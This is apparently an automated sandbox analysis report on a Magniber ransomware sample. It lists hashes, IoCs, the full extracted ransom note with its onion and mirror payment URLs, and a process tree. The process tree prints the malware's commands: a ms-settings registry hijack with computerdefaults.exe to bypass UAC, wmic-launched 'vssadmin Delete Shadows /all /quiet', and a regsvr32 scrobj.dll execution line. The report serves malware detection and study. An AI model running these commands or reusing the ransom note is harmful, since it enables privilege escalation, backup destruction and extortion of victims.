magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
138s
max time network
123s
platform
windows10_x64
resource
win10v20210408
submitted
09-07-2021 15:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2cd0a240c4b06a607eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2cd0a240c4b06a607eltalkfzj.jobsbig.cam/eltalkfzj http://2cd0a240c4b06a607eltalkfzj.boxgas.icu/eltalkfzj http://2cd0a240c4b06a607eltalkfzj.sixsees.club/eltalkfzj http://2cd0a240c4b06a607eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://2cd0a240c4b06a607eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://2cd0a240c4b06a607eltalkfzj.jobsbig.cam/eltalkfzj

http://2cd0a240c4b06a607eltalkfzj.boxgas.icu/eltalkfzj

http://2cd0a240c4b06a607eltalkfzj.sixsees.club/eltalkfzj

http://2cd0a240c4b06a607eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4992	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4944	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4928	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4936	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4920	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	3616	cmd.exe	47
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	3616	cmd.exe	47

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ExitDebug.crw => C:\Users\Admin\Pictures\ExitDebug.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RemoveRegister.raw => C:\Users\Admin\Pictures\RemoveRegister.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\DenyReset.tif => C:\Users\Admin\Pictures\DenyReset.tif.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\MergeCompare.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\MergeCompare.tiff => C:\Users\Admin\Pictures\MergeCompare.tiff.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\MountDismount.tif => C:\Users\Admin\Pictures\MountDismount.tif.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ConvertToSend.crw => C:\Users\Admin\Pictures\ConvertToSend.crw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\DismountSplit.raw => C:\Users\Admin\Pictures\DismountSplit.raw.eltalkfzj	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 996 set thread context of 2364	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	23
PID 996 set thread context of 2376	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	28
PID 996 set thread context of 2528	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	36
PID 996 set thread context of 2180	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	42
PID 996 set thread context of 3528	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	52
PID 996 set thread context of 3816	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	51

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3824	3816	WerFault.exe	51

Modifies registry class 29 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
576	notepad.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe
3824	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2180	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE
Token: SeShutdownPrivilege	2180	Explorer.EXE
Token: SeCreatePagefilePrivilege	2180	Explorer.EXE

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2180	Explorer.EXE
2180	Explorer.EXE
2180	Explorer.EXE
2180	Explorer.EXE
2180	Explorer.EXE
2180	Explorer.EXE
2180	Explorer.EXE
2180	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2180	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2180	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 576	2364	sihost.exe	77
PID 2364 wrote to memory of 576	2364	sihost.exe	77
PID 2364 wrote to memory of 2700	2364	sihost.exe	78
PID 2364 wrote to memory of 2700	2364	sihost.exe	78
PID 2364 wrote to memory of 3520	2364	sihost.exe	80
PID 2364 wrote to memory of 3520	2364	sihost.exe	80
PID 2364 wrote to memory of 496	2364	sihost.exe	81
PID 2364 wrote to memory of 496	2364	sihost.exe	81
PID 2528 wrote to memory of 3716	2528	taskhostw.exe	84
PID 2528 wrote to memory of 3716	2528	taskhostw.exe	84
PID 2528 wrote to memory of 2112	2528	taskhostw.exe	85
PID 2528 wrote to memory of 2112	2528	taskhostw.exe	85
PID 2376 wrote to memory of 3912	2376	svchost.exe	88
PID 2376 wrote to memory of 3912	2376	svchost.exe	88
PID 2376 wrote to memory of 2504	2376	svchost.exe	89
PID 2376 wrote to memory of 2504	2376	svchost.exe	89
PID 996 wrote to memory of 2348	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	92
PID 996 wrote to memory of 2348	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	92
PID 996 wrote to memory of 2332	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	93
PID 996 wrote to memory of 2332	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	93
PID 996 wrote to memory of 804	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	96
PID 996 wrote to memory of 804	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	96
PID 996 wrote to memory of 204	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	97
PID 996 wrote to memory of 204	996	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	97
PID 3528 wrote to memory of 8	3528	RuntimeBroker.exe	100
PID 3528 wrote to memory of 8	3528	RuntimeBroker.exe	100
PID 3528 wrote to memory of 492	3528	RuntimeBroker.exe	101
PID 3528 wrote to memory of 492	3528	RuntimeBroker.exe	101
PID 2180 wrote to memory of 2508	2180	Explorer.EXE	104
PID 2180 wrote to memory of 2508	2180	Explorer.EXE	104
PID 2180 wrote to memory of 3652	2180	Explorer.EXE	106
PID 2180 wrote to memory of 3652	2180	Explorer.EXE	106
PID 3520 wrote to memory of 4128	3520	cmd.exe	109
PID 3520 wrote to memory of 4128	3520	cmd.exe	109
PID 2112 wrote to memory of 4148	2112	cmd.exe	108
PID 2112 wrote to memory of 4148	2112	cmd.exe	108
PID 3716 wrote to memory of 4164	3716	cmd.exe	110
PID 3716 wrote to memory of 4164	3716	cmd.exe	110
PID 496 wrote to memory of 4176	496	cmd.exe	111
PID 496 wrote to memory of 4176	496	cmd.exe	111
PID 2508 wrote to memory of 4340	2508	cmd.exe	112
PID 2508 wrote to memory of 4340	2508	cmd.exe	112
PID 492 wrote to memory of 4352	492	cmd.exe	113
PID 492 wrote to memory of 4352	492	cmd.exe	113
PID 3912 wrote to memory of 4368	3912	cmd.exe	115
PID 3912 wrote to memory of 4368	3912	cmd.exe	115
PID 804 wrote to memory of 4380	804	cmd.exe	114
PID 804 wrote to memory of 4380	804	cmd.exe	114
PID 2332 wrote to memory of 4420	2332	cmd.exe	116
PID 2332 wrote to memory of 4420	2332	cmd.exe	116
PID 204 wrote to memory of 4432	204	cmd.exe	121
PID 204 wrote to memory of 4432	204	cmd.exe	121
PID 2348 wrote to memory of 4444	2348	cmd.exe	120
PID 2348 wrote to memory of 4444	2348	cmd.exe	120
PID 8 wrote to memory of 4456	8	cmd.exe	119
PID 8 wrote to memory of 4456	8	cmd.exe	119
PID 3652 wrote to memory of 4468	3652	cmd.exe	117
PID 3652 wrote to memory of 4468	3652	cmd.exe	117
PID 2504 wrote to memory of 4476	2504	cmd.exe	118
PID 2504 wrote to memory of 4476	2504	cmd.exe	118
PID 4960 wrote to memory of 5316	4960	cmd.exe	153
PID 4960 wrote to memory of 5316	4960	cmd.exe	153
PID 4880 wrote to memory of 5328	4880	cmd.exe	151
PID 4880 wrote to memory of 5328	4880	cmd.exe	151

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2364
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:576
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://2cd0a240c4b06a607eltalkfzj.jobsbig.cam/eltalkfzj^&1^&58789187^&71^&283^&2215063"
  2⤵
  PID:2700
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4128
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:496
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2376
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3912
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4368
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4476

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2528
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4164
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4148

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2180
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:996
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4444
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4420
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:804
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4380
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:204
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4432
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4340
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4468

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3816
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3816 -s 836
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  PID:3824

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3528
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:8
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4456
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:492
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4352

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4904
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5496

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4896
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5508

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4888
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5420

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4976
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5444

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4992
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5448

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4984
